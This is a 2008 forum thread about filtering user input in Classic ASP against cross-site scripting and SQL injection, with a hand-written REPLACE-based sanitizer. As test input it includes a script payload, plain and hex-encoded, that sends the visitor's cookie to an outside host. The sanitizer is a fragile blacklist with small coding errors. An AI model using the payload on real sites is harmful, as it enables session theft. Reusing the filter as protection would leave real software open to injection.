Code Injection

DaveGerard · March 6th, 2008, 02:28 PM

Does anyone have any fool proof way of filtering all non alpha-numeric values from user input but allow predefined HTML tags such as:

<b></b>
<i></i>
[u]</u>
<table></table>
<tr></tr>
<td></td>
<ol></ol>[list]</ul>
<li></li>

as well as maintaining non threatening links? Any help on this is greatly appreciated. Thanks in advance.

Dave

dparsons · March 6th, 2008, 04:07 PM

With regard to the predefined tags, IMHO, it it better practice to use a type of forum code. For example if I want to make some text bold on this forum I use [ b ] [ /b ] with no spaces. The forum then translates that into <b></b>.

If you take this approach with the predefined tags your job of handling malicious code becomes easier because you can simply HTMLEncode the rest of the input which will render most XSS attacks useless. However, if you are looking for an apporach to detect a <script></script> block, for example, you should use Regular Expressions. (You could of course use InStr() but that isn't nearly as efficient as RegEx)

The easiest way to avoid SQL Injection attacks is to use parameterized queries as opposed to inline dynamic sql.

hth.

================================================== =========
Read this if you want to know how to get a correct reply for your question:
http://www.catb.org/~esr/faqs/smart-questions.html
================================================== =========
.: Wrox Technical Editor / Author :.
Wrox Books 24 x 7
================================================== =========

DaveGerard · March 6th, 2008, 07:04 PM

I thought about using regular expressions, but I don't quite have the experience with them to get something really bullet proof in a short amount of time.

I thought of a solution that I think might work well using pseudo tags (i.e. forum tags) and thought I'd post the code to get some other opinions. It requires defining some accepatable pseudo tags and assigning them a unique alpha numeric value, in my case 32 digits in length.

There are 4 replace filters that I run the string through and they are as follows:
1) Replace all encoded values into their standard values (e.g. '%26' to '&').
2) Transpose pseudo tags into 32 digit unique value. (e.g. '[ul]' to 'koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1')
3) Replace all non-acceptable characters into the equivelant HTML code OR possibly remove them all together (e.g. '<' to '#60;').
4) Transpose all unique 32 digit values to previous pseudo tags (e.g. 'koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1' to '[ul]').
5) Translate pseudo tags at run time (e.g. '[ul]' to '[list]').

I think that if this is run against some rogue injection that the result will be enough to eliminate the threat even though the output is less than desireable. It should however work well for standard text, including minor HTML tags.

If anyone has any thoughts on this I would live to hear them. The solution is as follows:

NOTE: I had to add in a couple of speces for pseudos to avoid being interpreted by this forum (e.g. [ url ]).

<%
'-- Malicious URL --
MyString = "[ url ] h ttp://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6 f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d% 27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65 %63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%6 9%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b% 64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f %73%63%72%69%70%74%3e[ -url ]Test Link[ /url ]"

'-- OR --

'-- Malicious URL --
h ttp://host/a.php?variable="><script>document.location='h ttp://w ww.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>

' == replace hex values with standard values ==
    MyString = REPLACE(MyString, "%20", " ")
    MyString = REPLACE(MyString, "%21", "!")
    MyString = REPLACE(MyString, "%22", """")
    MyString = REPLACE(MyString, "%23", "#")
    MyString = REPLACE(MyString, "%24", "$")
    MyString = REPLACE(MyString, "%25", "%")
    MyString = REPLACE(MyString, "%26", "&")
    MyString = REPLACE(MyString, "%27", "''")
    MyString = REPLACE(MyString, "%28", "(")
    MyString = REPLACE(MyString, "%29", ")")
    MyString = REPLACE(MyString, "%2a", "*")
    MyString = REPLACE(MyString, "%2b", "+")
    MyString = REPLACE(MyString, "%2c", ",")
    MyString = REPLACE(MyString, "%2d", "-")
    MyString = REPLACE(MyString, "%2e", ".")
    MyString = REPLACE(MyString, "%2f", "/")
    MyString = REPLACE(MyString, "%2A", "*")
    MyString = REPLACE(MyString, "%2B", "+")
    MyString = REPLACE(MyString, "%2C", ",")
    MyString = REPLACE(MyString, "%2D", "-")
    MyString = REPLACE(MyString, "%2E", ".")
    MyString = REPLACE(MyString, "%2F", "/")
    MyString = REPLACE(MyString, "%30", "0")
    MyString = REPLACE(MyString, "%31", "1")
    MyString = REPLACE(MyString, "%32", "2")
    MyString = REPLACE(MyString, "%33", "3")
    MyString = REPLACE(MyString, "%34", "4")
    MyString = REPLACE(MyString, "%35", "5")
    MyString = REPLACE(MyString, "%36", "6")
    MyString = REPLACE(MyString, "%37", "7")
    MyString = REPLACE(MyString, "%38", "8")
    MyString = REPLACE(MyString, "%39", "9")
    MyString = REPLACE(MyString, "%3a", ":")
    MyString = REPLACE(MyString, "%3b", ";")
    MyString = REPLACE(MyString, "%3c", "<")
    MyString = REPLACE(MyString, "%3d", "=")
    MyString = REPLACE(MyString, "%3e", ">")
    MyString = REPLACE(MyString, "%3f", "?")
    MyString = REPLACE(MyString, "%3A", ":")
    MyString = REPLACE(MyString, "%3B", ";")
    MyString = REPLACE(MyString, "%3C", "<")
    MyString = REPLACE(MyString, "%3D", "=")
    MyString = REPLACE(MyString, "%3E", ">")
    MyString = REPLACE(MyString, "%3F", "?")
    MyString = REPLACE(MyString, "%40", "@")
    MyString = REPLACE(MyString, "%41", "A")
    MyString = REPLACE(MyString, "%42", "B")
    MyString = REPLACE(MyString, "%43", "C")
    MyString = REPLACE(MyString, "%44", "D")
    MyString = REPLACE(MyString, "%45", "E")
    MyString = REPLACE(MyString, "%46", "F")
    MyString = REPLACE(MyString, "%47", "G")
    MyString = REPLACE(MyString, "%48", "H")
    MyString = REPLACE(MyString, "%49", "I")
    MyString = REPLACE(MyString, "%4a", "J")
    MyString = REPLACE(MyString, "%4b", "K")
    MyString = REPLACE(MyString, "%4c", "L")
    MyString = REPLACE(MyString, "%4d", "M")
    MyString = REPLACE(MyString, "%4e", "N")
    MyString = REPLACE(MyString, "%4f", "O")
    MyString = REPLACE(MyString, "%4A", "J")
    MyString = REPLACE(MyString, "%4B", "K")
    MyString = REPLACE(MyString, "%4C", "L")
    MyString = REPLACE(MyString, "%4D", "M")
    MyString = REPLACE(MyString, "%4E", "N")
    MyString = REPLACE(MyString, "%4F", "O")
    MyString = REPLACE(MyString, "%50", "P")
    MyString = REPLACE(MyString, "%51", "Q")
    MyString = REPLACE(MyString, "%52", "R")
    MyString = REPLACE(MyString, "%53", "S")
    MyString = REPLACE(MyString, "%54", "T")
    MyString = REPLACE(MyString, "%55", "U")
    MyString = REPLACE(MyString, "%56", "V")
    MyString = REPLACE(MyString, "%57", "W")
    MyString = REPLACE(MyString, "%58", "X")
    MyString = REPLACE(MyString, "%59", "Y")
    MyString = REPLACE(MyString, "%5a", "Z")
    MyString = REPLACE(MyString, "%5b", "[")
    MyString = REPLACE(MyString, "%5c", "\")
    MyString = REPLACE(MyString, "%5d", "]")
    MyString = REPLACE(MyString, "%5e", "^")
    MyString = REPLACE(MyString, "%5f", "_")
    MyString = REPLACE(MyString, "%5A", "Z")
    MyString = REPLACE(MyString, "%5B", "[")
    MyString = REPLACE(MyString, "%5C", "\")
    MyString = REPLACE(MyString, "%5D", "]")
    MyString = REPLACE(MyString, "%5E", "^")
    MyString = REPLACE(MyString, "%5F", "_")
    MyString = REPLACE(MyString, "%60", "`")
    MyString = REPLACE(MyString, "%61", "a")
    MyString = REPLACE(MyString, "%62", "b")
    MyString = REPLACE(MyString, "%63", "c")
    MyString = REPLACE(MyString, "%64", "d")
    MyString = REPLACE(MyString, "%65", "e")
    MyString = REPLACE(MyString, "%66", "f")
    MyString = REPLACE(MyString, "%67", "g")
    MyString = REPLACE(MyString, "%68", "h")
    MyString = REPLACE(MyString, "%69", "i")
    MyString = REPLACE(MyString, "%6a", "j")
    MyString = REPLACE(MyString, "%6b", "k")
    MyString = REPLACE(MyString, "%6c", "l")
    MyString = REPLACE(MyString, "%6d", "m")
    MyString = REPLACE(MyString, "%6e", "n")
    MyString = REPLACE(MyString, "%6f", "o")
    MyString = REPLACE(MyString, "%6A", "j")
    MyString = REPLACE(MyString, "%6B", "k")
    MyString = REPLACE(MyString, "%6C", "l")
    MyString = REPLACE(MyString, "%6D", "m")
    MyString = REPLACE(MyString, "%6E", "n")
    MyString = REPLACE(MyString, "%6F", "o")
    MyString = REPLACE(MyString, "%70", "p")
    MyString = REPLACE(MyString, "%71", "q")
    MyString = REPLACE(MyString, "%72", "r")
    MyString = REPLACE(MyString, "%73", "s")
    MyString = REPLACE(MyString, "%74", "t")
    MyString = REPLACE(MyString, "%75", "u")
    MyString = REPLACE(MyString, "%76", "v")
    MyString = REPLACE(MyString, "%77", "w")
    MyString = REPLACE(MyString, "%78", "x")
    MyString = REPLACE(MyString, "%79", "y")
    MyString = REPLACE(MyString, "%7a", "z")
    MyString = REPLACE(MyString, "%7b", "{")
    MyString = REPLACE(MyString, "%7c", "|")
    MyString = REPLACE(MyString, "%7d", "}")
    MyString = REPLACE(MyString, "%7e", "~")
    MyString = REPLACE(MyString, "%7A", "z")
    MyString = REPLACE(MyString, "%7B", "{")
    MyString = REPLACE(MyString, "%7C", "|")
    MyString = REPLACE(MyString, "%7D", "}")
    MyString = REPLACE(MyString, "%7F", "~")
    response.write "1: " & MyString & "<br><br>"

' == transpose pseudo tags into 32 digit unique values ==
    MyString = REPLACE(MyString, "[ url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye1")
    MyString = REPLACE(MyString, "[ -url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye2")
    MyString = REPLACE(MyString, "[ /url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye3")
    MyString = REPLACE(MyString, "[ol]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr1")
    MyString = REPLACE(MyString, "[/ol]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr2")
    MyString = REPLACE(MyString, "[ul]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1")
    MyString = REPLACE(MyString, "[/ul]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2")
    MyString = REPLACE(MyString, "[li]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1")
    MyString = REPLACE(MyString, "[/li]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2")
    MyString = REPLACE(MyString, "[ URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye1")
    MyString = REPLACE(MyString, "[ -URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye2")
    MyString = REPLACE(MyString, "[ /URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye3")
    MyString = REPLACE(MyString, "[OL]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr1")
    MyString = REPLACE(MyString, "[/OL]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr2")
    MyString = REPLACE(MyString, "[UL]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1")
    MyString = REPLACE(MyString, "[/UL]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2")
    MyString = REPLACE(MyString, "[LI]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1")
    MyString = REPLACE(MyString, "[/LI]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2")

' == replace non-acceptable characters with html values ==
' MyString = REPLACE(MyString, ";", "#59;")
    MyString = REPLACE(MyString, "!", "#33;")
    MyString = REPLACE(MyString, """", "#34;")
' MyString = REPLACE(MyString, "#", "#35;")
    MyString = REPLACE(MyString, "$", "#36;")
    MyString = REPLACE(MyString, "%", "#37;")
' MyString = REPLACE(MyString, "&", "#38;")
    MyString = REPLACE(MyString, "''", "#39;")
    MyString = REPLACE(MyString, "(", "#40;")
    MyString = REPLACE(MyString, ")", "#41;")
    MyString = REPLACE(MyString, "*", "#42;")
    MyString = REPLACE(MyString, "+", "#43;")
    MyString = REPLACE(MyString, ",", "#44;")
    MyString = REPLACE(MyString, "-", "#45;")
    MyString = REPLACE(MyString, ".", "#46;")
    MyString = REPLACE(MyString, "/", "#47;")
    MyString = REPLACE(MyString, ":", "#58;")
    MyString = REPLACE(MyString, "<", "")
    MyString = REPLACE(MyString, "=", "#61;")
    MyString = REPLACE(MyString, ">", "")
    MyString = REPLACE(MyString, "?", "#63;")
    MyString = REPLACE(MyString, "@", "#64;")
    MyString = REPLACE(MyString, "[", "")
    MyString = REPLACE(MyString, "\", "#92;")
    MyString = REPLACE(MyString, "]", "")
    MyString = REPLACE(MyString, "^", "#94;")
    MyString = REPLACE(MyString, "_", "#95;")
    MyString = REPLACE(MyString, "`", "#96;")
    MyString = REPLACE(MyString, "{", "#123;")
    MyString = REPLACE(MyString, "|", "#124;")
    MyString = REPLACE(MyString, "}", "#125;")
    MyString = REPLACE(MyString, "~", "#126;")

' == transpose 32 digit unique values into pseudo tags ==
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye1", "[ url]")
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye2", "[ -url]")
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye3", "[ /url]")
    MyString = REPLACE(MyString, "w6ck3hngas7asxqgzdcvp8gklp5gvytr1", "[ol]")
    MyString = REPLACE(MyString, "w6ck3hngas7asxqgzdcvp8gklp5gvytr2", "[/ol]")
    MyString = REPLACE(MyString, "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1", "[ul]")
    MyString = REPLACE(MyString, "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2", "[/ul]")
    MyString = REPLACE(MyString, "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1", "[li]")
    MyString = REPLACE(MyString, "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2", "[/li]")

    response.write "4: " & MyString & "<br><br>"
%>